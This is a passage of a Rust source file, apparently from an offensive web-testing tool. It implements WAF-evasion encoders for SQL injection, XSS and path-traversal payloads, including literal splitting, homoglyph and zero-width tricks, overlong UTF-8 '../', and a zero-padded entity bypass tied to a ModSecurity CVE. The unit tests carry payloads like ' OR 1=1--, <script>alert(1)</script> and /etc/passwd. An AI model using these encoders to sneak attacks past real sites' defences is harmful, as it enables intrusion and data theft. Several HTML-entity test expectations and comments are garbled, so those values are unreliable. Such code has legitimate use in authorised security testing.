792 let hi = 0xD800 + (v >> 10);
793 let lo = 0xDC00 + (v & 0x3FF);
794 let _ = match i % 2 {
795 0 => write!(&mut out, "\\u{:04x}\\U{:04X}", hi, lo),
796 _ => write!(&mut out, "\\U{:04X}\\u{:04x}", hi, lo),
797 };
798 continue;
799 }
800 let _ = match i % 4 {
801 0 => write!(&mut out, "\\u{:04x}", cp), // lowercase u, lowercase hex
802 1 => write!(&mut out, "\\U{:04X}", cp), // uppercase U, uppercase hex
803 2 => write!(&mut out, "\\u{:04X}", cp), // lowercase u, uppercase hex
804 _ => write!(&mut out, "\\U{:04x}", cp), // uppercase U, lowercase hex
805 };
806 }
807 out
808}
809
810/// SQL adjacent-string-literal concatenation โ every `'string'` literal of
811/// length โฅ 2 is rewritten as a sequence of single-character adjacent
812/// literals: `'admin'` โ `'a' 'd' 'm' 'i' 'n'`.
813///
814/// **Bypass mechanism**: SQL standard (ANSI SQL-92 ยง5.3) specifies that
815/// two adjacent character-string literals separated only by whitespace
816/// are concatenated by the parser. MySQL, Postgres, SQLite, Oracle, DB2
817/// all implement this. WAF rules that match the literal substring of
818/// well-known credentials or paths (e.g. `'admin'`, `'/etc/passwd'`)
819/// see N unrelated single-character strings instead of one token. The
820/// database rejoins them at parse time โ no comments, no CONCAT calls,
821/// no special functions. Pure SQL semantics.
822///
823/// **Idempotent**: every output sub-literal has length 1, below the
824/// split threshold โ a second pass leaves the output unchanged.
825///
826/// **Context**: Effective against any byte-pattern WAF inspecting
827/// SQL bodies. Inert outside SQL context (won't fire on non-quoted
828/// payloads).
829#[must_use]
830pub fn sql_adjacent_string_concat(payload: &str) -> String {
831 let mut out = String::with_capacity(payload.len() + 8);
832 let mut chars = payload.chars().peekable();
833 while let Some(ch) = chars.next() {
834 if ch != '\'' {
835 out.push(ch);
836 continue;
837 }
838 let mut literal = String::new();
839 let mut closed = false;
840 while let Some(&next) = chars.peek() {
841 chars.next();
842 if next == '\'' {
843 if chars.peek() == Some(&'\'') {
844 literal.push('\'');
845 chars.next();
846 continue;
847 }
848 closed = true;
849 break;
850 }
851 literal.push(next);
852 }
853 if !closed {
854 out.push('\'');
855 out.push_str(&literal);
856 continue;
857 }
858 let lit_chars: Vec<char> = literal.chars().collect();
859 if lit_chars.len() < 2 {
860 // Length-0 or length-1 literal: pass through. Note for
861 // length-1 with `'`: that's a literal containing a single
862 // `'`, which we encode as `''''` (four-quote form) to keep
863 // the output SQL-valid.
864 out.push('\'');
865 if lit_chars.len() == 1 && lit_chars[0] == '\'' {
866 out.push_str("''");
867 } else {
868 out.push_str(&literal);
869 }
870 out.push('\'');
871 continue;
872 }
873 // Single-character split: each char of the literal becomes its
874 // own `'c'` quoted token, joined by single spaces. ANSI SQL-92
875 // ยง5.3 concatenates them at parse time. Idempotent: each output
876 // sub-literal has length 1 (below the threshold) so a second
877 // pass sees only short literals and produces identical output.
878 //
879 // Escaped-quote handling: if the source literal contained a
880 // SQL `''` escape it lives in `literal` as a single `'` char.
881 // The shattered single-char literal for that position emits
882 // `''''` (four-quote form: opening quote, escaped quote, escaped
883 // quote, closing quote) so the database reassembles the
884 // original `'` content. Idempotency holds because `''''` parses
885 // as a length-1 literal containing `'` on the next pass.
886 let mut first = true;
887 for c in lit_chars {
888 if !first {
889 out.push(' ');
890 }
891 first = false;
892 out.push('\'');
893 if c == '\'' {
894 out.push_str("''");
895 } else {
896 out.push(c);
897 }
898 out.push('\'');
899 }
900 }
901 out
902}
903
904/// Homoglyph substitution โ replaces select ASCII characters with visually
905/// identical Unicode characters from other scripts.
906///
907/// **Bypass mechanism**: WAFs match `'`, `"`, `<`, `>`, `=`, etc. as literal
908/// bytes. Unicode homoglyphs look identical in logs but aren't matched by
909/// byte-level regex. If the backend performs Unicode normalization (NFKC) or
910/// accepts these codepoints in SQL/HTML contexts, the payload executes.
911///
912/// **Context**: Effective against byte-level WAFs. Requires backend Unicode
913/// tolerance (common in modern frameworks).
914#[must_use]
915pub fn homoglyph_encode(payload: &str) -> String {
916 let mut out = String::with_capacity(payload.len() * 4);
917 for ch in payload.chars() {
918 let mapped = match ch {
919 // INTENTIONALLY NOT REPLACED โ SQL string delimiters.
920 // Pre-fix `'` โ U+2019 and `"` โ U+201D were mapped to
921 // their right-single/double quotation marks. Those
922 // codepoints are NOT recognised as string delimiters
923 // by ANY SQL parser โ they're treated as word
924 // characters. The host query's string literal is never
925 // closed, the injection context-break disappears, and
926 // the payload becomes inert. Modern frameworks rarely
927 // NFKC-normalise BEFORE the SQL parser sees the bytes,
928 // so the assumption that this trick survives was wrong
929 // in practice. Keep `'` and `"` ASCII; mutate only the
930 // non-delimiter punctuation below.
931 //
932 // Comparison operators
933 '<' => '\u{FF1C}', // FULLWIDTH LESS-THAN SIGN (๏ผ)
934 '>' => '\u{FF1E}', // FULLWIDTH GREATER-THAN SIGN (๏ผ)
935 '=' => '\u{FF1D}', // FULLWIDTH EQUALS SIGN (๏ผ)
936 // Punctuation
937 '(' => '\u{FF08}', // FULLWIDTH LEFT PARENTHESIS (๏ผ)
938 ')' => '\u{FF09}', // FULLWIDTH RIGHT PARENTHESIS (๏ผ)
939 ';' => '\u{FF1B}', // FULLWIDTH SEMICOLON (๏ผ)
940 '-' => '\u{2010}', // HYPHEN (โ)
941 '/' => '\u{2215}', // DIVISION SLASH (โ)
942 // Keep letters, digits, and delimiters unchanged.
943 c => c,
944 };
945 out.push(mapped);
946 }
947 out
948}
949
950/// Inject zero-width / format characters between letters of `payload`.
951///
952/// `chars` selects which invisible char to insert; `positions` controls
953/// where (every-other / per-keyword-letter / FNV-seeded). The output
954/// is byte-distinct from the input but visually identical AND, for
955/// `chars = ZERO_WIDTH_DEFAULTS`, semantically equivalent to most HTML
956/// and SQL parsers (which strip U+200Bโ200D / U+FEFF on parse).
957///
958/// Sucuri-documented XSS bypass `<scrโipt>alert(1)</scrโipt>`
959/// uses U+200B between `scr` and `ipt`; the WAF regex `/script/i`
960/// misses; the browser's HTML parser drops the ZWSP and renders.
961///
962/// Use [`ZERO_WIDTH_DEFAULTS`] for the recommended cycle of
963/// [U+200B, U+200C, U+200D, U+FEFF, U+034F] โ rotating across these
964/// per-position defeats WAFs that have hardcoded a single zero-width
965/// stripper.
966#[must_use]
967pub fn zero_width_inject(payload: &str, invisible_char: char) -> String {
968 let mut out = String::with_capacity(payload.len() * 2);
969 let mut chars = payload.chars().peekable();
970 while let Some(ch) = chars.next() {
971 out.push(ch);
972 // Inject after every alphanumeric except the last char of the
973 // string (so trailing context is preserved).
974 if ch.is_ascii_alphanumeric() && chars.peek().is_some() {
975 out.push(invisible_char);
976 }
977 }
978 out
979}
980
981/// Recommended cycle of invisible characters for zero-width injection.
982/// `[U+200B ZWSP, U+200C ZWNJ, U+200D ZWJ, U+FEFF BOM, U+034F CGJ]`.
983pub const ZERO_WIDTH_DEFAULTS: [char; 5] =
984 ['\u{200B}', '\u{200C}', '\u{200D}', '\u{FEFF}', '\u{034F}'];
985
986/// Inject a combining diacritical mark after each letter of `payload`.
987///
988/// `sฬelect` (s + U+0308 COMBINING DIAERESIS + elect) reads as `select`
989/// after NFC normalisation (Python `unicodedata.normalize('NFC', x)`,
990/// Java `Normalizer.normalize(s, NFC)`) but the WAF regex `/select/`
991/// sees a different byte sequence and misses.
992///
993/// Common safe marks (no NFC reflow, just stripped by char-walk
994/// readers): U+0300 grave, U+0301 acute, U+0308 diaeresis, U+0327
995/// cedilla. U+034F COMBINING GRAPHEME JOINER is the most invisible
996/// (zero width, no visual diacritic), so it's the default.
997#[must_use]
998pub fn combining_mark_inject(payload: &str, mark: char) -> String {
999 let mut out = String::with_capacity(payload.len() * 3);
1000 for ch in payload.chars() {
1001 out.push(ch);
1002 if ch.is_ascii_alphabetic() {
1003 out.push(mark);
1004 }
1005 }
1006 out
1007}
1008
1009/// Cross-script Cyrillic / Greek letter substitution.
1010///
1011/// Unlike [`homoglyph_encode`] (punctuation-only by design),
1012/// `script_homoglyph_encode` substitutes the *letters* themselves
1013/// with visually-identical codepoints from Cyrillic + Greek scripts
1014/// that the WAF regex sees as different bytes. Two sub-classes:
1015///
1016/// 1. **Non-normalising** (Cyrillic ั U+0455, ะต U+0435, ะพ U+043E,
1017/// ะฐ U+0430; Greek ฮฟ U+03BF, ฮฝ U+03BD, โฆ) โ backend and WAF both
1018/// see different codepoints, but MSSQL's implicit Unicodeโvarchar
1019/// coercion maps Cyrillic lookalikes to ASCII via collation
1020/// (`SQL_Latin1_General_CP1_CI_AI`).
1021/// 2. **NFKC-normalising** โ letterlike block letters (already covered
1022/// by `letterlike_encode`).
1023///
1024/// This function targets class 1 only โ for class 2 use
1025/// [`letterlike_encode`] / `math_*_encode`.
1026#[must_use]
1027pub fn script_homoglyph_encode(payload: &str) -> String {
1028 let mut out = String::with_capacity(payload.len() * 2);
1029 for ch in payload.chars() {
1030 let mapped = match ch {
1031 // Cyrillic lowercase lookalikes.
1032 'a' => '\u{0430}', // CYRILLIC SMALL LETTER A
1033 'c' => '\u{0441}', // CYRILLIC SMALL LETTER ES
1034 'e' => '\u{0435}', // CYRILLIC SMALL LETTER IE
1035 'o' => '\u{043E}', // CYRILLIC SMALL LETTER O
1036 'p' => '\u{0440}', // CYRILLIC SMALL LETTER ER
1037 's' => '\u{0455}', // CYRILLIC SMALL LETTER DZE
1038 'x' => '\u{0445}', // CYRILLIC SMALL LETTER HA
1039 'y' => '\u{0443}', // CYRILLIC SMALL LETTER U
1040 // Cyrillic uppercase lookalikes.
1041 'A' => '\u{0410}',
1042 'B' => '\u{0412}',
1043 'C' => '\u{0421}',
1044 'E' => '\u{0415}',
1045 'H' => '\u{041D}',
1046 'K' => '\u{041A}',
1047 'M' => '\u{041C}',
1048 'O' => '\u{041E}',
1049 'P' => '\u{0420}',
1050 'T' => '\u{0422}',
1051 'X' => '\u{0425}',
1052 // Greek lookalikes for remaining letters.
1053 'n' => '\u{03B7}', // GREEK SMALL LETTER ETA
1054 'v' => '\u{03BD}', // GREEK SMALL LETTER NU
1055 c => c,
1056 };
1057 out.push(mapped);
1058 }
1059 out
1060}
1061
1062/// Turkish dotless-i substitution: replace `i`/`I` with U+0131/U+0130.
1063///
1064/// U+0131 LATIN SMALL LETTER DOTLESS I does NOT ASCII-uppercase to `I`
1065/// (it only uppercases to `I` in Turkish locale). A WAF that performs
1066/// ASCII case-fold via Lua `string.lower` or PHP `strtolower` (CRS
1067/// default) misses `scrฤฑpt` when looking for `script`. The HTML5 spec
1068/// requires browsers to normalise U+0131 to `i` in tag names, so
1069/// `<scrฤฑpt>alert(1)</scrฤฑpt>` renders as a script tag.
1070///
1071/// CVE-class: GitHub auth byass via Turkish dotless-i (dev.to 2018).
1072#[must_use]
1073pub fn turkish_i_encode(payload: &str) -> String {
1074 payload
1075 .chars()
1076 .map(|ch| match ch {
1077 'i' => '\u{0131}',
1078 'I' => '\u{0130}',
1079 c => c,
1080 })
1081 .collect()
1082}
1083
1084/// Sharp-s (ร U+00DF) substitution for `s`/`S`.
1085///
1086/// ร lowercases to itself in most locales, but Unicode FULL case-fold
1087/// (`str::to_lowercase` in Rust, `str.casefold()` in Python) maps the
1088/// CAPITAL letter sharp s `แบ` (U+1E9E) to `ss`. WAFs that case-fold
1089/// before regex see different byte sequence; backends with full
1090/// Unicode casefold reach the same `script` / `select`. Narrower
1091/// applicability than [`turkish_i_encode`].
1092#[must_use]
1093pub fn sharp_s_encode(payload: &str) -> String {
1094 payload
1095 .chars()
1096 .map(|ch| match ch {
1097 's' | 'S' => '\u{00DF}', // ร
1098 c => c,
1099 })
1100 .collect()
1101}
1102
1103/// AWS WAF JSON-pointer escape โ encode every char of `key` as
1104/// `\uXXXX` so the WAF's JSON-pointer rule (e.g. `/id` literal-match)
1105/// misses, while the backend JSON parser decodes the escape and
1106/// routes the value to the original field.
1107///
1108/// Returns the JSON fragment `{"<key-escaped>": "<value>"}` ready to
1109/// drop into a request body. Sicuranext 2024 confirmed bypass.
1110#[must_use]
1111pub fn json_key_unicode_escape(key: &str, value: &str) -> String {
1112 let mut escaped_key = String::with_capacity(key.len() * 6);
1113 for ch in key.chars() {
1114 let cp = ch as u32;
1115 if cp <= 0xFFFF {
1116 escaped_key.push_str(&format!("\\u{:04x}", cp));
1117 } else {
1118 // Surrogate pair for non-BMP codepoints.
1119 let v = cp - 0x10000;
1120 let hi = 0xD800 + (v >> 10);
1121 let lo = 0xDC00 + (v & 0x3FF);
1122 escaped_key.push_str(&format!("\\u{:04x}\\u{:04x}", hi, lo));
1123 }
1124 }
1125 // Value goes through JSON-safe encode (the existing helper).
1126 let value_json = serde_json::to_string(value).unwrap_or_else(|_| format!("\"{value}\""));
1127 format!("{{\"{escaped_key}\": {value_json}}}")
1128}
1129
1130/// Overlong UTF-8 encoding of `.` and `/` for path traversal.
1131///
1132/// CRS GitHub issue #4189 (opened 2025-07, still open) โ CRS does
1133/// not alert on `%c0%ae%c0%ae%c0%af` (`../` in 2-byte overlong UTF-8).
1134/// Servers that strictly decode UTF-8 reject these as malformed; older
1135/// JVMs, some C libs (CVE-2017-9805 Struts2), and a non-trivial set
1136/// of internal services accept them. WAF gap + permissive backend =
1137/// path traversal that the WAF doesn't see.
1138///
1139/// `width` selects the overlong representation: 2 (default), 3, or 4
1140/// bytes. Each level is independently checked by some decoders, so a
1141/// 3-byte overlong may pass where a 2-byte one is filtered.
1142#[must_use]
1143pub fn overlong_utf8_path(path: &str, width: u8) -> String {
1144 let dot = match width {
1145 2 => "%c0%ae",
1146 3 => "%e0%80%ae",
1147 _ => "%f0%80%80%ae", // 4-byte default for unknown width
1148 };
1149 let slash = match width {
1150 2 => "%c0%af",
1151 3 => "%e0%80%af",
1152 _ => "%f0%80%80%af",
1153 };
1154 let bs = match width {
1155 2 => "%c0%5c",
1156 3 => "%e0%80%5c",
1157 _ => "%f0%80%80%5c",
1158 };
1159 // ยง1 SPEED: replaced `.map(|c| c.to_string()).collect::<String>()` which
1160 // allocates one String per character with a push-loop into a pre-sized
1161 // buffer. The three special chars map to static string slices; all other
1162 // codepoints push directly. No heap allocation per character.
1163 let mut out = String::with_capacity(path.len() * slash.len());
1164 for c in path.chars() {
1165 match c {
1166 '.' => out.push_str(dot),
1167 '/' => out.push_str(slash),
1168 '\\' => out.push_str(bs),
1169 c => out.push(c),
1170 }
1171 }
1172 out
1173}
1174
1175/// Bidi override wrapper โ wraps `reversed_keyword` between U+202E
1176/// (RIGHT-TO-LEFT OVERRIDE) and U+202C (POP DIRECTIONAL FORMATTING).
1177///
1178/// The WAF scans left-to-right byte order: it sees `tceleS`. Rendered
1179/// text in a BiDi-aware viewer (e.g. browser, IDE, security analyst's
1180/// dashboard) shows `Select`. CVE-2021-42574 (Trojan Source) class.
1181///
1182/// **Narrow direct bypass surface** โ most SQL parsers reject bare
1183/// U+202E. Useful primarily for WAF log poisoning and rule-auditing
1184/// tool confusion; some template engines do strip bidi chars before
1185/// forwarding, in which case the reversed payload becomes live.
1186#[must_use]
1187pub fn bidi_inject(reversed_keyword: &str) -> String {
1188 format!("\u{202E}{reversed_keyword}\u{202C}")
1189}
1190
1191#[cfg(test)]
1192mod tests {
1193 use super::*;
1194
1195 #[test]
1196 fn unicode_encode_basic() {
1197 assert_eq!(unicode_encode("A"), "\\u0041");
1198 assert_eq!(unicode_encode("AB"), "\\u0041\\u0042");
1199 }
1200
1201 #[test]
1202 fn json_unicode_alnum_keyword_split() {
1203 // "UNION" becomes 5 `\uXXXX` sequences, ASCII bytes nowhere.
1204 let out = json_unicode_alnum("UNION");
1205 assert_eq!(out, "\\u0055\\u004E\\u0049\\u004F\\u004E");
1206 assert!(!out.contains("UNION"));
1207 }
1208
1209 // โโ json_unicode_full / mixed_case tests โโโโโโโโโโโโโโโโโโโโโโโโโโ
1210
1211 #[test]
1212 fn json_unicode_full_escapes_every_char() {
1213 let out = json_unicode_full("a' b");
1214 // Every char including space and quote escaped.
1215 assert!(out.contains("\\u0061")); // a
1216 assert!(out.contains("\\u0027")); // '
1217 assert!(out.contains("\\u0020")); // space
1218 assert!(out.contains("\\u0062")); // b
1219 // No literal input char remains as plain (input letters 'a' and 'b'
1220 // appear only inside hex of escapes; the literal 'a' standalone
1221 // boundary should NOT be present as a runnable token).
1222 // Simpler check: every output codepoint is either backslash, 'u',
1223 // or hex digit.
1224 for c in out.chars() {
1225 assert!(
1226 c == '\\' || c == 'u' || c.is_ascii_hexdigit(),
1227 "unexpected raw char {c:?} in {out}"
1228 );
1229 }
1230 }
1231
1232 #[test]
1233 fn json_unicode_full_idempotent_on_pre_escaped() {
1234 let already = "\\u0073elect";
1235 let out = json_unicode_full(already);
1236 // Pre-existing s stays unchanged; "elect" gets escaped.
1237 assert!(out.starts_with("\\u0073"));
1238 assert!(out.contains("\\u0065")); // e
1239 }
1240
1241 #[test]
1242 fn json_unicode_full_handles_non_bmp_via_surrogate_pair() {
1243 // U+1F600 GRINNING FACE โ ๐
1244 let out = json_unicode_full("๐");
1245 assert_eq!(out, "\\uD83D\\uDE00");
1246 }
1247
1248 #[test]
1249 fn json_unicode_mixed_case_alternates_forms() {
1250 let out = json_unicode_mixed_case("abcd");
1251 // 4 chars โ 4 different forms.
1252 assert!(out.contains("\\u0061")); // i=0 lowercase
1253 assert!(out.contains("\\U0062")); // i=1 uppercase U
1254 assert!(out.contains("\\u0063")); // i=2 lower u, upper hex
1255 assert!(out.contains("\\U0064")); // i=3 upper U, lower hex
1256 }
1257
1258 #[test]
1259 fn json_unicode_alnum_leaves_punctuation() {
1260 // SQLi shape: keywords escaped, structural delimiters bare.
1261 let out = json_unicode_alnum("' OR 1=1--");
1262 assert_eq!(out, "' \\u004F\\u0052 \\u0031=\\u0031--");
1263 let out2 = json_unicode_alnum("AB CD");
1264 assert_eq!(out2, "\\u0041\\u0042 \\u0043\\u0044");
1265 }
1266
1267 #[test]
1268 fn json_unicode_alnum_idempotent_skip_pass() {
1269 // Second pass MUST be a no-op โ already-escaped \uXXXX
1270 // sequences are detected and passed through.
1271 let once = json_unicode_alnum("UNION SELECT");
1272 let twice = json_unicode_alnum(&once);
1273 assert_eq!(once, twice, "tamper must stabilize");
1274 }
1275
1276 #[test]
1277 fn json_unicode_alnum_preserves_quote_unencoded() {
1278 // ' is U+0027 โ NOT alphanumeric, so must stay literal.
1279 let out = json_unicode_alnum("'");
1280 assert_eq!(out, "'");
1281 }
1282
1283 #[test]
1284 fn json_unicode_alnum_xss_keyword_split() {
1285 // <script>alert โ `<`, `>`, `(`, `)` stay bare; letters/digits escape.
1286 let out = json_unicode_alnum("<script>alert(1)</script>");
1287 assert!(!out.contains("script"));
1288 assert!(!out.contains("alert"));
1289 assert!(out.contains('<'));
1290 assert!(out.contains('>'));
1291 assert!(out.contains('('));
1292 }
1293
1294 #[test]
1295 fn json_unicode_alnum_empty_input() {
1296 assert_eq!(json_unicode_alnum(""), "");
1297 }
1298
1299 #[test]
1300 fn sql_adjacent_string_concat_basic() {
1301 // 'admin' (len 5) โ 5 single-char adjacent literals.
1302 assert_eq!(sql_adjacent_string_concat("'admin'"), "'a' 'd' 'm' 'i' 'n'");
1303 }
1304
1305 #[test]
1306 fn sql_adjacent_string_concat_short_literal_unchanged() {
1307 // Length-1 literals must pass through (already minimum).
1308 assert_eq!(sql_adjacent_string_concat("'a'"), "'a'");
1309 assert_eq!(sql_adjacent_string_concat("''"), "''");
1310 }
1311
1312 #[test]
1313 fn sql_adjacent_string_concat_idempotent() {
1314 // Well-formed (balanced quotes) payload โ the literals 'admin'
1315 // and 'root' each shatter into single-char adjacent literals.
1316 let once = sql_adjacent_string_concat("WHERE x='admin' OR y='root'");
1317 let twice = sql_adjacent_string_concat(&once);
1318 assert_eq!(once, twice, "tamper must stabilize on second pass");
1319 assert!(once.contains("'a' 'd' 'm' 'i' 'n'"));
1320 assert!(once.contains("'r' 'o' 'o' 't'"));
1321 }
1322
1323 #[test]
1324 fn sql_adjacent_string_concat_preserves_outside_literal() {
1325 // No quoted literal in payload โ must be a no-op.
1326 assert_eq!(sql_adjacent_string_concat("1 OR 1=1--"), "1 OR 1=1--");
1327 }
1328
1329 #[test]
1330 fn sql_adjacent_string_concat_handles_escaped_quote() {
1331 // SQL '' escape inside a literal: the position holding `'` is
1332 // emitted as the four-quote form `''''` โ opening, escaped pair,
1333 // closing โ which parses as a length-1 literal containing `'`.
1334 // The database reassembles "O" + "'" + "B" + "r" + "i" + "e" + "n".
1335 let out = sql_adjacent_string_concat("'O''Brien'");
1336 assert_eq!(out, "'O' '''' 'B' 'r' 'i' 'e' 'n'");
1337 }
1338
1339 #[test]
1340 fn sql_adjacent_string_concat_escaped_quote_idempotent() {
1341 // Second pass: the `''''` token is a length-1 literal containing
1342 // `'` (below split threshold). It must pass through unchanged
1343 // (via the length-1 branch with the escaped-quote sub-case).
1344 let once = sql_adjacent_string_concat("'O''Brien'");
1345 let twice = sql_adjacent_string_concat(&once);
1346 assert_eq!(once, twice);
1347 }
1348
1349 #[test]
1350 fn sql_adjacent_string_concat_single_quote_literal_emits_four_quotes() {
1351 // A literal of length 1 containing only `'` (source: `''''`)
1352 // must output the same `''''` (passthrough form).
1353 let out = sql_adjacent_string_concat("''''");
1354 assert_eq!(out, "''''");
1355 }
1356
1357 #[test]
1358 fn sql_adjacent_string_concat_its_a_test_shatters_correctly() {
1359 // The dogfood agent's B5 reproducer.
1360 let out = sql_adjacent_string_concat("'it''s a test'");
1361 // Literal content: "it's a test" (11 chars). Each char emits
1362 // its own single-char literal; the `'` becomes `''''`.
1363 assert_eq!(out, "'i' 't' '''' 's' ' ' 'a' ' ' 't' 'e' 's' 't'");
1364 }
1365
1366 #[test]
1367 fn sql_adjacent_string_concat_unterminated_quote_passthrough() {
1368 // Defensive: an unclosed quote must not crash and must not
1369 // wrap-then-mistakenly-close. Output should preserve the bytes
1370 // verbatim except for the unmatched-quote tail.
1371 let out = sql_adjacent_string_concat("'unclosed");
1372 assert_eq!(out, "'unclosed");
1373 }
1374
1375 #[test]
1376 fn sql_adjacent_string_concat_path_literal_split() {
1377 // /etc/passwd path literal is a high-fidelity LFI fingerprint.
1378 // 11 chars โ 11 single-char literals; the byte sequence
1379 // `/etc/passwd` no longer appears contiguously.
1380 let out = sql_adjacent_string_concat("'/etc/passwd'");
1381 assert_eq!(out, "'/' 'e' 't' 'c' '/' 'p' 'a' 's' 's' 'w' 'd'");
1382 assert!(!out.contains("/etc/passwd"));
1383 }
1384
1385 #[test]
1386 fn json_unicode_alnum_unicode_input_passes_through() {
1387 // Non-ASCII chars (ๆฅๆฌ่ช) are NOT ascii_alphanumeric โ left bare.
1388 // This keeps the function focused on the keyword-bypass mission.
1389 let out = json_unicode_alnum("ๆฅๆฌ");
1390 assert_eq!(out, "ๆฅๆฌ");
1391 }
1392
1393 #[test]
1394 fn unicode_encode_special_chars() {
1395 let encoded = unicode_encode("' OR 1=1--");
1396 assert!(encoded.contains("\\u0027")); // '
1397 assert!(encoded.contains("\\u003D")); // =
1398 }
1399
1400 #[test]
1401 fn unicode_encode_unicode() {
1402 let encoded = unicode_encode("ๆฅๆฌ่ช");
1403 assert_eq!(encoded, "\\u65E5\\u672C\\u8A9E");
1404 }
1405
1406 #[test]
1407 fn iis_unicode_encode_basic() {
1408 assert_eq!(iis_unicode_encode("A"), "%u0041");
1409 assert_eq!(iis_unicode_encode("AB"), "%u0041%u0042");
1410 }
1411
1412 #[test]
1413 fn iis_unicode_encode_bmp_only_for_3byte_utf8() {
1414 // U+65E5 (ๆฅ) is BMP โ emits as a single %uXXXX, no
1415 // surrogate. This is the existing happy path.
1416 assert_eq!(iis_unicode_encode("ๆฅ"), "%u65E5");
1417 }
1418
1419 #[test]
1420 fn iis_unicode_encode_non_bmp_emits_surrogate_pair() {
1421 // U+1F600 (๐) is supplementary plane. Pre-fix this emitted
1422 // `%u1F600` (5 hex digits โ invalid IIS %u, silently
1423 // unencodable, bypass-rate killer). Post-fix it MUST emit a
1424 // UTF-16 surrogate pair `%uD83D%uDE00`.
1425 assert_eq!(iis_unicode_encode("๐"), "%uD83D%uDE00");
1426 }
1427
1428 #[test]
1429 fn iis_unicode_encode_mixed_bmp_and_non_bmp() {
1430 // Adversarial: a mix of plain ASCII + BMP + supplementary
1431 // must produce exactly one %uXXXX or %uXXXX%uXXXX per char.
1432 // No 5-digit %u sequences anywhere โ pin the regression.
1433 let out = iis_unicode_encode("Aๆฅ๐");
1434 assert_eq!(out, "%u0041%u65E5%uD83D%uDE00");
1435 // Anti-regression: scan for any 5-hex-digit %u sequence.
1436 // The fix would silently regress if someone widened the
1437 // format string to %u{:05X} thinking it "supports" non-BMP.
1438 for hex_run in out.split("%u").skip(1) {
1439 let hex_part: String = hex_run
1440 .chars()
1441 .take_while(|c| c.is_ascii_hexdigit())
1442 .collect();
1443 assert!(
1444 hex_part.len() == 4,
1445 "every %u sequence must be exactly 4 hex digits (IIS spec); \
1446 got {hex_part:?} in output {out:?}"
1447 );
1448 }
1449 }
1450
1451 #[test]
1452 fn json_encode_basic() {
1453 // F67: encoder produces escaped CONTENT only (no
1454 // surrounding double-quotes). Callers inject into an
1455 // existing JSON string field; wrapping our own quotes
1456 // would break the host JSON document.
1457 assert_eq!(json_string_encode("A"), "A");
1458 assert_eq!(json_string_encode("A\\B"), "A\\\\B");
1459 assert_eq!(json_string_encode("A\"B"), "A\\\"B");
1460 assert_eq!(json_string_encode("A\nB"), "A\\nB");
1461 }
1462
1463 #[test]
1464 fn json_encode_control_chars() {
1465 assert_eq!(json_string_encode("\x01"), "\\u0001");
1466 }
1467
1468 #[test]
1469 fn html_entity_encode_basic() {
1470 assert_eq!(html_entity_encode("A"), "A");
1471 assert_eq!(html_entity_encode("AB"), "AB");
1472 }
1473
1474 #[test]
1475 fn html_entity_encode_special_chars() {
1476 let encoded = html_entity_encode("<script>");
1477 assert_eq!(encoded, "<script>");
1478 }
1479
1480 #[test]
1481 fn html_entity_decimal_encode_basic() {
1482 assert_eq!(html_entity_decimal_encode("A"), "A");
1483 assert_eq!(html_entity_decimal_encode("<"), "<");
1484 }
1485
1486 #[test]
1487 fn html_entity_encode_empty() {
1488 assert_eq!(html_entity_encode(""), "");
1489 }
1490
1491 // โโ html_entity_zero_pad tests (CVE-2025-27110) โโโโโโโโโโโโโโโโโโโโ
1492
1493 #[test]
1494 fn html_entity_zero_pad_hex_width_4_matches_cve_advisory_example() {
1495 // Pinned to the exact form the CVE-2025-27110 advisory uses
1496 // as its smoking gun: `<` for `<`. If this drifts
1497 // (someone "tidies" the formatter), every libmodsecurity
1498 // 3.0.13 bypass stops working.
1499 assert_eq!(html_entity_zero_pad("<", 4, true), "<");
1500 }
1501
1502 #[test]
1503 fn html_entity_zero_pad_decimal_width_4_matches_cve_advisory_example() {
1504 // The decimal counterpart from the same advisory: `<`
1505 // for `<`. Same bypass mechanism, different radix.
1506 assert_eq!(html_entity_zero_pad("<", 4, false), "<");
1507 }
1508
1509 #[test]
1510 fn html_entity_zero_pad_width_1_is_unpadded() {
1511 // width=1 means "pad to at least 1" which for any code point
1512 // > 0 is a no-op. Anti-rig: the function must not insert
1513 // leading zeros at width=1, otherwise it becomes equivalent
1514 // to width=2 and the "no-padding" form is unreachable.
1515 assert_eq!(html_entity_zero_pad("A", 1, true), "A");
1516 assert_eq!(html_entity_zero_pad("A", 1, false), "A");
1517 }
1518
1519 #[test]
1520 fn html_entity_zero_pad_width_0_is_coerced_to_1() {
1521 // Boundary: pad=0 is a contract-violating input. We coerce
1522 // to 1 (the "no-padding" form) rather than emit `&#x;` (a
1523 // malformed entity). Catches a future refactor that uses
1524 // `pad.min(16)` only and forgets the `.max(1)` lower bound.
1525 assert_eq!(html_entity_zero_pad("A", 0, true), "A");
1526 }
1527
1528 #[test]
1529 fn html_entity_zero_pad_width_above_cap_is_clamped() {
1530 // Boundary: pad=100 is an anti-DoS concern. We clamp at 16.
1531 // The result for 'A' (0x41 = 2 hex digits) padded to 16 is
1532 // `A` โ 14 leading zeros. Pin the exact
1533 // byte sequence so a future change to the cap is visible
1534 // (and intentional).
1535 assert_eq!(html_entity_zero_pad("A", 100, true), "A");
1536 }
1537
1538 #[test]
1539 fn html_entity_zero_pad_empty_input_produces_empty_output() {
1540 // Anti-rig: empty input must produce empty output (the
1541 // identity element of concatenation). A naive `for ch in
1542 // ""` does the right thing today; this test pins that the
1543 // result is exactly "" rather than e.g. "&#x;" from a
1544 // single dangling write.
1545 assert_eq!(html_entity_zero_pad("", 4, true), "");
1546 assert_eq!(html_entity_zero_pad("", 4, false), "");
1547 }
1548
1549 #[test]
1550 fn html_entity_zero_pad_xss_payload_round_trip_browser_equivalent() {
1551 // CVE-2025-27110 exploit-path smoke: a `<script>` payload
1552 // routed through width-4 hex must produce the exact byte
1553 // sequence that the CVE write-up shows as bypassing
1554 // libmodsecurity 3.0.13. If this changes, we're not
1555 // shipping the documented bypass anymore.
1556 let out = html_entity_zero_pad("<script>", 4, true);
1557 assert_eq!(
1558 out,
1559 "<script>"
1560 );
1561 }
1562
1563 // โโ html_entity_variants tests โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
1564
1565 #[test]
1566 fn html_entity_variants_cycles_four_forms() {
1567 // 'A'=0x41=65 โ verify each of the four rotation slots
1568 let encoded = html_entity_variants("AAAA");
1569 assert_eq!(encoded, "AAAA");
1570 }
1571
1572 #[test]
1573 fn html_entity_variants_continues_rotation() {
1574 // 'A'=65 โ fifth char returns to slot 0 (lowercase-x hex)
1575 let encoded = html_entity_variants("AAAAA");
1576 assert_eq!(encoded, "AAAAA");
1577 }
1578
1579 #[test]
1580 fn html_entity_variants_empty() {
1581 assert_eq!(html_entity_variants(""), "");
1582 }
1583
1584 #[test]
